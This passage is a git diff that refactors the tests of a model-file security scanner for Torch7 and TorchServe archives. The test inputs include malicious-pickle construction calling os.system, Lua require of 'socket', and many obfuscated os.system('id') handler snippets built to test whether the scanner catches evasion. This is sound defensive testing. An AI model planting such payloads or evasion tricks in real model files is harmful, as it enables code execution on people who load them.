check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED - ] - assert len(dynamic_findings) == 1 - assert dynamic_findings[0].severity == IssueSeverity.WARNING + _assert_torch7_untrusted_require( + tmp_path, + (b"T7\x00\x00torch.FloatTensor nn.Sequential\nlocal mod = require [[socket]]\n"), + ("long-bracket-require.t7"), + ) def test_scan_detects_comment_separated_bare_require(tmp_path: Path) -> None: - payload = b'T7\x00\x00torch.FloatTensor nn.Sequential\nlocal mod = require -- decoy\n"socket"\n' - path = _write_torch7_file(tmp_path, payload, filename="commented-bare-require.t7") - - result = Torch7Scanner().scan(str(path)) - - dynamic_findings = [ - check - for check in result.checks - if check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED - ] - assert len(dynamic_findings) == 1 - assert dynamic_findings[0].severity == IssueSeverity.WARNING + _assert_torch7_untrusted_require( + tmp_path, + (b'T7\x00\x00torch.FloatTensor nn.Sequential\nlocal mod = require -- decoy\n"socket"\n'), + ("commented-bare-require.t7"), + ) def test_scan_allows_bare_string_require_for_safe_module(tmp_path: Path) -> None: payload = b'T7\x00\x00torch.FloatTensor nn.Sequential\nlocal torch = require "torch"\n' - path = _write_torch7_file(tmp_path, payload, filename="safe-bare-require.t7") - - result = Torch7Scanner().scan(str(path)) - - dynamic_findings = [ - check - for check in result.checks - if check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED - ] - assert dynamic_findings == [] + _assert_safe_lua_require(payload, tmp_path, "safe-bare-require.t7") def test_scan_allows_long_bracket_require_for_safe_module(tmp_path: Path) -> None: payload = b"T7\x00\x00torch.FloatTensor nn.Sequential\nlocal torch = require [[torch]]\n" - path = _write_torch7_file(tmp_path, payload, filename="safe-long-bracket-require.t7") - - result = Torch7Scanner().scan(str(path)) - - dynamic_findings = [ - check - for check in result.checks - if check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED - ] - assert dynamic_findings == [] + _assert_safe_lua_require(payload, tmp_path, "safe-long-bracket-require.t7") def test_scan_handles_corrupt_file_gracefully(tmp_path: Path) -> None: @@ -587,3 +526,44 @@ def test_false_positive_numeric_tensor_blob_not_flagged_as_exec(tmp_path: Path) if check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED ] assert len(exec_failures) == 0 + + +def _assert_torch7_untrusted_require(tmp_path: Path, source: bytes, filename: str) -> None: + payload = source + path = _write_torch7_file(tmp_path, payload, filename=filename) + + result = Torch7Scanner().scan(str(path)) + + dynamic_findings = [ + check + for check in result.checks + if check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED + ] + assert len(dynamic_findings) == 1 + assert dynamic_findings[0].severity == IssueSeverity.WARNING + + +def _assert_lua_execution(payload: bytes, tmp_path: Path, filename: str) -> None: + path = _write_torch7_file(tmp_path, payload, filename=filename) + + result = Torch7Scanner().scan(str(path)) + execution_findings = [ + check + for check in result.checks + if check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED + ] + assert len(execution_findings) == 1 + assert execution_findings[0].severity == IssueSeverity.CRITICAL + + +def _assert_safe_lua_require(payload: bytes, tmp_path: Path, filename: str) -> None: + path = _write_torch7_file(tmp_path, payload, filename=filename) + + result = Torch7Scanner().scan(str(path)) + + dynamic_findings = [ + check + for check in result.checks + if check.name == "Torch7 Dynamic Module Load Analysis" and check.status == CheckStatus.FAILED + ] + assert dynamic_findings == [] diff --git a/tests/scanners/test_torchserve_mar_scanner.py b/tests/scanners/test_torchserve_mar_scanner.py index 9285ca302..e2f1d815a 100644 --- a/tests/scanners/test_torchserve_mar_scanner.py +++ b/tests/scanners/test_torchserve_mar_scanner.py @@ -9,7 +9,7 @@ import sys import tempfile import zipfile -from collections.abc import Mapping, Sequence +from collections.abc import Callable, Mapping, Sequence from pathlib import Path from typing import Any, cast @@ -23,6 +23,28 @@ from modelaudit.scanners.torchserve_mar_scanner import TorchServeMarScanner from modelaudit.scanners.zip_scanner import ZipScanner from tests.helpers import create_mock_pytorch_zip +from tests.helpers.file_creators import SystemCommandPayload + + +def _count_matching_member_reads( + monkeypatch: pytest.MonkeyPatch, + scanner: TorchServeMarScanner, + matches: Callable[[str], bool], +) -> list[int]: + real_read_member_bounded = scanner._read_member_bounded + read_count = [0] + + def counting_read_member_bounded( + archive: zipfile.ZipFile, + member_info: zipfile.ZipInfo, + max_bytes: int, + ) -> bytes: + if matches(member_info.filename): + read_count[0] += 1 + return real_read_member_bounded(archive, member_info, max_bytes) + + monkeypatch.setattr(scanner, "_read_member_bounded", counting_read_member_bounded) + return read_count def _create_mar_archive( @@ -56,11 +78,7 @@ def _build_malicious_pickle() -> bytes: # This helper intentionally builds a malicious pickle for scanner coverage. # The payload command is a harmless `echo` so test fixtures stay safe. - class DangerousPayload: - def __reduce__(self): - return (os_module.system, ("echo torchserve-mar-test",)) - - return pickle.dumps(DangerousPayload()) + return pickle.dumps(SystemCommandPayload("echo torchserve-mar-test", lambda: os_module.system)) def _failed_checks(result: ScanResult, check_name: str) -> list[Any]: @@ -625,19 +643,7 @@ def test_unreadable_handler_returns_inconclusive_exit_code_and_is_not_cached( }, filename="unreadable_handler.mar", ) - original_read_member_bounded = TorchServeMarScanner._read_member_bounded - - def read_with_failure( - self: TorchServeMarScanner, - archive: zipfile.ZipFile, - member_info: zipfile.ZipInfo, - max_bytes: int, - ) -> bytes: - if member_info.filename == "handler.py": - raise RuntimeError("CRC mismatch") - return original_read_member_bounded(self, archive, member_info, max_bytes) - - monkeypatch.setattr(TorchServeMarScanner, "_read_member_bounded", read_with_failure) + _install_member_read_failure(monkeypatch, "handler.py") direct = TorchServeMarScanner().scan(str(mar_path)) handler_failures = _failed_checks(direct, "TorchServe Handler Static Analysis") @@ -676,24 +682,12 @@ def test_unparseable_handler_returns_inconclusive_exit_code_and_is_not_cached(tm def test_scan_detects_getattr_wrapped_handler_execution_primitive(tmp_path: Path) -> None: - manifest = {"model": {"handler": "handler.py", "serializedFile": "weights.bin"}} - mar_path = _create_mar_archive( + _assert_getattr_handler_execution( tmp_path, - manifest=manifest, - entries={ - "handler.py": b"import os\n\ndef handle(data, context):\n return getattr(os, 'system')('id')\n", - "weights.bin": b"weights", - }, - filename="getattr_handler.mar", + (b"import os\n\ndef handle(data, context):\n return getattr(os, 'system')('id')\n"), + ("getattr_handler.mar"), ) - result = TorchServeMarScanner().scan(str(mar_path)) - handler_failures = _failed_checks(result, "TorchServe Handler Static Analysis") - - assert len(handler_failures) == 1 - assert handler_failures[0].severity == IssueSeverity.CRITICAL - assert "os.system" in handler_failures[0].message - @pytest.mark.parametrize( "handler_source", @@ -859,10 +853,7 @@ def test_dynamic_import_handler_analysis_resolves_nested_attributes( handler_source: bytes, dangerous_name: str, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert dangerous_name in risky_calls + _assert_handler_dangerous_call(handler_source, dangerous_name) @pytest.mark.parametrize( @@ -876,19 +867,13 @@ def test_dynamic_import_handler_analysis_resolves_nested_attributes( def test_dynamic_import_handler_analysis_resolves_literal_selected_strings( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_ignores_invalid_literal_string_selection() -> None: handler_source = b"def handle(data, context):\n return getattr(__import__('os'), ['system'][1])('id')\n" - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -906,10 +891,7 @@ def test_dynamic_import_handler_analysis_ignores_invalid_literal_string_selectio ], ) def test_dynamic_import_handler_analysis_respects_shadowed_import_helpers(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_restores_local_import_helper() -> None: @@ -921,10 +903,7 @@ def test_dynamic_import_handler_analysis_restores_local_import_helper() -> None: b" return helper(len)\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_possible_branch_aliases() -> None: @@ -937,10 +916,7 @@ def test_dynamic_import_handler_analysis_keeps_possible_branch_aliases() -> None b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_possible_branch_loader_aliases() -> None: @@ -953,10 +929,7 @@ def test_dynamic_import_handler_analysis_keeps_possible_branch_loader_aliases() b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_falsey_branch_reachable() -> None: @@ -968,10 +941,7 @@ def test_dynamic_import_handler_analysis_keeps_falsey_branch_reachable() -> None b" return __import__('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_definitely_truthy_branch_unreachable() -> None: @@ -983,10 +953,7 @@ def test_dynamic_import_handler_analysis_keeps_definitely_truthy_branch_unreacha b" return __import__('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -1016,10 +983,7 @@ def test_dynamic_import_handler_analysis_preserves_conditional_break_aliases(loo b" module = __import__('math')\n" + loop_source + b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1049,10 +1013,7 @@ def test_dynamic_import_handler_analysis_replaces_stale_aliases_on_conditional_b b" module = __import__('os')\n" + loop_source + b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_applies_finally_before_break_exit() -> None: @@ -1067,10 +1028,7 @@ def test_dynamic_import_handler_analysis_applies_finally_before_break_exit() -> b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_drops_stale_alias_before_finally_break_exit() -> None: @@ -1085,10 +1043,7 @@ def test_dynamic_import_handler_analysis_drops_stale_alias_before_finally_break_ b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize("terminal_statement", [b"return []", b"continue"]) @@ -1105,10 +1060,7 @@ def test_dynamic_import_handler_analysis_honors_finally_overriding_break( b" return __import__('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -1124,10 +1076,7 @@ def test_dynamic_import_handler_analysis_honors_finally_overriding_break( ], ) def test_dynamic_import_handler_analysis_resolves_late_global_aliases(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_does_not_leak_nested_import_aliases() -> None: @@ -1140,10 +1089,7 @@ def test_dynamic_import_handler_analysis_does_not_leak_nested_import_aliases() - b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -1176,10 +1122,7 @@ def test_dynamic_import_handler_analysis_does_not_leak_nested_import_aliases() - ], ) def test_dynamic_import_handler_analysis_tracks_bound_aliases(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1232,10 +1175,7 @@ def test_dynamic_import_handler_analysis_closes_dynamic_execution_bypasses( handler_source: bytes, dangerous_name: str, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert dangerous_name in risky_calls + _assert_handler_dangerous_call(handler_source, dangerous_name) @pytest.mark.parametrize( @@ -1286,10 +1226,7 @@ def test_dynamic_import_handler_analysis_closes_dynamic_execution_bypasses( def test_dynamic_import_handler_analysis_avoids_non_executing_alias_false_positives( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -1313,10 +1250,7 @@ def test_dynamic_import_handler_analysis_avoids_non_executing_alias_false_positi def test_dynamic_import_handler_analysis_preserves_annotation_only_runtime_bindings( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_treats_match_captures_as_local_bindings() -> None: @@ -1330,10 +1264,7 @@ def test_dynamic_import_handler_analysis_treats_match_captures_as_local_bindings b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_ignores_invalid_ctypes_library_loader_factories() -> None: @@ -1361,10 +1292,7 @@ def test_dynamic_import_handler_analysis_does_not_leak_class_namespace_aliases_i b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_preserves_class_body_execution_order() -> None: @@ -1372,10 +1300,7 @@ def test_dynamic_import_handler_analysis_preserves_class_body_execution_order() b"class Handler:\n runner = load('os').system('id')\n\nfrom importlib import import_module as load\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_replaces_rebound_lifecycle_attributes() -> None: @@ -1389,10 +1314,7 @@ def test_dynamic_import_handler_analysis_replaces_rebound_lifecycle_attributes() b" return self.module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_keeps_conditional_lifecycle_attributes() -> None: @@ -1407,10 +1329,7 @@ def test_dynamic_import_handler_analysis_keeps_conditional_lifecycle_attributes( b" return self.module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1440,10 +1359,7 @@ def test_dynamic_import_handler_analysis_keeps_conditional_lifecycle_attributes( def test_dynamic_import_handler_analysis_preserves_enclosing_function_closures( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1488,10 +1404,7 @@ def test_dynamic_import_handler_analysis_preserves_enclosing_function_closures( def test_dynamic_import_handler_analysis_closes_iterable_pattern_and_closure_bypasses( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_keeps_comprehension_targets_scoped() -> None: @@ -1503,10 +1416,7 @@ def test_dynamic_import_handler_analysis_keeps_comprehension_targets_scoped() -> b" return module('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1534,10 +1444,7 @@ def test_dynamic_import_handler_analysis_keeps_comprehension_targets_scoped() -> def test_dynamic_import_handler_analysis_closes_callable_and_walrus_bypasses( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1582,10 +1489,7 @@ def test_dynamic_import_handler_analysis_closes_callable_and_walrus_bypasses( def test_dynamic_import_handler_analysis_closes_literal_helper_and_callback_bypasses( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1624,10 +1528,7 @@ def test_dynamic_import_handler_analysis_tracks_executed_callable_arguments( handler_source: bytes, dangerous_name: str, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert dangerous_name in risky_calls + _assert_handler_dangerous_call(handler_source, dangerous_name) @pytest.mark.parametrize( @@ -1641,10 +1542,7 @@ def test_dynamic_import_handler_analysis_tracks_literal_selected_static_callable handler_source: bytes, dangerous_name: str, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert dangerous_name in risky_calls + _assert_handler_dangerous_call(handler_source, dangerous_name) @pytest.mark.parametrize( @@ -1682,10 +1580,7 @@ def test_dynamic_import_handler_analysis_tracks_literal_selected_static_callable def test_dynamic_import_handler_analysis_does_not_execute_callbacks_for_empty_inputs( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_consumes_all_map_inputs_when_nonempty() -> None: @@ -1695,10 +1590,7 @@ def test_dynamic_import_handler_analysis_consumes_all_map_inputs_when_nonempty() b"(__import__('os').system('id') for _ in [1])))\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1749,10 +1641,7 @@ def test_dynamic_import_handler_analysis_honors_namespace_subscript_rebinding( b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_does_not_treat_function_vars_as_globals() -> None: @@ -1763,10 +1652,7 @@ def test_dynamic_import_handler_analysis_does_not_treat_function_vars_as_globals b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -1797,10 +1683,7 @@ def test_dynamic_import_handler_analysis_does_not_treat_function_vars_as_globals ], ) def test_dynamic_import_handler_analysis_applies_called_scope_setters(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_merges_conditional_setter_definitions() -> None: @@ -1820,10 +1703,7 @@ def test_dynamic_import_handler_analysis_merges_conditional_setter_definitions() b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_replaces_sequential_setter_definition() -> None: @@ -1841,10 +1721,7 @@ def test_dynamic_import_handler_analysis_replaces_sequential_setter_definition() b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -1875,10 +1752,7 @@ def test_dynamic_import_handler_analysis_replaces_sequential_setter_definition() ], ) def test_dynamic_import_handler_analysis_follows_called_function_returns(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_does_not_execute_unused_function_return() -> None: @@ -1890,10 +1764,7 @@ def test_dynamic_import_handler_analysis_does_not_execute_unused_function_return b" return []\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_ignores_unreachable_function_return() -> None: @@ -1907,10 +1778,7 @@ def test_dynamic_import_handler_analysis_ignores_unreachable_function_return() - b" return get_loader()('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_ignores_unused_global_setter() -> None: @@ -1924,10 +1792,7 @@ def test_dynamic_import_handler_analysis_ignores_unused_global_setter() -> None: b" return load([1])\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_does_not_leak_called_setter_from_unused_function() -> None: @@ -1942,10 +1807,7 @@ def test_dynamic_import_handler_analysis_does_not_leak_called_setter_from_unused b"load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_propagates_transitive_global_setter_call() -> None: @@ -1963,10 +1825,7 @@ def test_dynamic_import_handler_analysis_propagates_transitive_global_setter_cal b" return load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_does_not_persist_globals_from_unexecuted_outer_call() -> None: @@ -1983,10 +1842,7 @@ def test_dynamic_import_handler_analysis_does_not_persist_globals_from_unexecute b"load('os').system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -1997,10 +1853,7 @@ def test_dynamic_import_handler_analysis_does_not_persist_globals_from_unexecute ], ) def test_dynamic_import_handler_analysis_handles_recursive_lazy_aliases(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -2021,10 +1874,7 @@ def test_dynamic_import_handler_analysis_handles_recursive_lazy_aliases(handler_ def test_dynamic_import_handler_analysis_keeps_risks_in_recursive_lazy_aliases( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_merges_many_aliases_without_serializing_ast( @@ -2057,10 +1907,7 @@ def test_dynamic_import_handler_analysis_follows_called_getattr_defaults() -> No b" return getattr(__import__('os'), 'definitely_missing', __import__('os').system)('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_does_not_execute_unused_getattr_defaults() -> None: @@ -2070,10 +1917,7 @@ def test_dynamic_import_handler_analysis_does_not_execute_unused_getattr_default b" return []\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_does_not_call_getattr_default_for_known_attribute() -> None: @@ -2081,10 +1925,7 @@ def test_dynamic_import_handler_analysis_does_not_call_getattr_default_for_known b"def handle(data, context):\n return getattr(__import__('math'), 'sqrt', __import__('os').system)(4)\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -2207,10 +2048,7 @@ def test_dynamic_import_handler_analysis_does_not_call_getattr_default_for_known ], ) def test_dynamic_import_handler_analysis_tracks_reachable_runtime_aliases(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") @pytest.mark.parametrize( @@ -2273,10 +2111,7 @@ def test_dynamic_import_handler_analysis_tracks_reachable_runtime_aliases(handle ], ) def test_dynamic_import_handler_analysis_ignores_unreachable_runtime_aliases(handler_source: bytes) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -2294,10 +2129,7 @@ def test_dynamic_import_handler_analysis_ignores_unreachable_runtime_aliases(han def test_dynamic_import_handler_analysis_resolves_namespace_mapping_get_calls( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_respects_shadowed_namespace_mapping_helper() -> None: @@ -2307,10 +2139,7 @@ def test_dynamic_import_handler_analysis_respects_shadowed_namespace_mapping_hel b" return vars(__import__('os')).get('system')('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) @pytest.mark.parametrize( @@ -2329,10 +2158,7 @@ def test_dynamic_import_handler_analysis_respects_shadowed_namespace_mapping_hel def test_dynamic_import_handler_analysis_avoids_deleted_and_lambda_alias_false_positives( handler_source: bytes, ) -> None: - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_keeps_literal_loop_exit_binding() -> None: @@ -2343,10 +2169,7 @@ def test_dynamic_import_handler_analysis_keeps_literal_loop_exit_binding() -> No b" return module.system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_evaluates_defaults_at_definition_time() -> None: @@ -2357,10 +2180,7 @@ def test_dynamic_import_handler_analysis_evaluates_defaults_at_definition_time() b"from importlib import import_module as load\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_tracks_mapping_rest_captures() -> None: @@ -2371,10 +2191,7 @@ def test_dynamic_import_handler_analysis_tracks_mapping_rest_captures() -> None: b" return rest['module'].system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" in risky_calls + _assert_handler_dangerous_call(handler_source, "os.system") def test_dynamic_import_handler_analysis_excludes_matched_keys_from_mapping_rest() -> None: @@ -2385,10 +2202,7 @@ def test_dynamic_import_handler_analysis_excludes_matched_keys_from_mapping_rest b" return rest['module'].system('id')\n" ) - risky_calls, parse_error = TorchServeMarScanner()._find_high_risk_calls(handler_source) - - assert parse_error is None - assert "os.system" not in risky_calls + _assert_handler_without_system_call(handler_source) def test_dynamic_import_handler_analysis_skips_nonmatching_mapping_patterns() -> None: @@ -2399,10 +2213,7 @@ def test_dynamic_import_handler_analysis_skips_nonmatching_mapping_patterns() -> b" return rest['module'].system('id')\n" ) - risky_calls, parse_error = 